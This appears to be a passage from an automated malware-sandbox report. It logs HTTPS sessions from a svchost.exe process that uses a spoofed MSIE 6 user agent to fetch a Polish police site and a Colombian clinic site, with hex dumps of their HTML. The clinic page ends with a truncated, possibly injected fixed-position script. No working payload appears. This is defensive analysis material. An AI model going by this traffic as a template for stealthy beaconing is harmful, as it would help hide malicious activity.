                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2016INData Raw: 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70
                                                                                                                                                                                                                                                                        Data Ascii: ome"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="p
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2017INData Raw: 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f 6f 74 65 72 22 3e 0a 3c 64 69 76
                                                                                                                                                                                                                                                                        Data Ascii: ="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-footer"><div
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2018INData Raw: 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br><br></br>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2020INData Raw: 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 50 42 58 3a 20 2b 35 37 20 36 30
                                                                                                                                                                                                                                                                        Data Ascii: iv> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">PBX: +57 60
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2021INData Raw: 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: cle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-content
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2022INData Raw: 34 34 34 0d 0a 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 4a
                                                                                                                                                                                                                                                                        Data Ascii: 444ype="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="JavaScript" type="text/J
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2023INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        132192.168.2.66191291.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1853OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:57:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1854INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1870INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1886INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1902INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        133192.168.2.662016104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1853OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        Cookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2036INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9QhvyMGeNB6qvw9pqBw1HVJd6kOYSGT%2Fv9xUmQKvgXTp%2FTGvv%2Bbl9uJBLNmb2M4WUraxMJirIUdoyO9oTEJrYeK9Uk%2Fz%2Bo9VsuR4yyddViYfZMw43KajXh07zRsRcP4BIxURIobd3jA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a867482068e9-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2037INData Raw: 37 63 61 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7cad<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2037INData Raw: 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70
                                                                                                                                                                                                                                                                        Data Ascii: s/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/temp
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2039INData Raw: 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74
                                                                                                                                                                                                                                                                        Data Ascii: js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootst
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2040INData Raw: 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61
                                                                                                                                                                                                                                                                        Data Ascii: ngines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="ga
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2041INData Raw: 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c
                                                                                                                                                                                                                                                                        Data Ascii: size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2043INData Raw: 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20
                                                                                                                                                                                                                                                                        Data Ascii: tem g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li
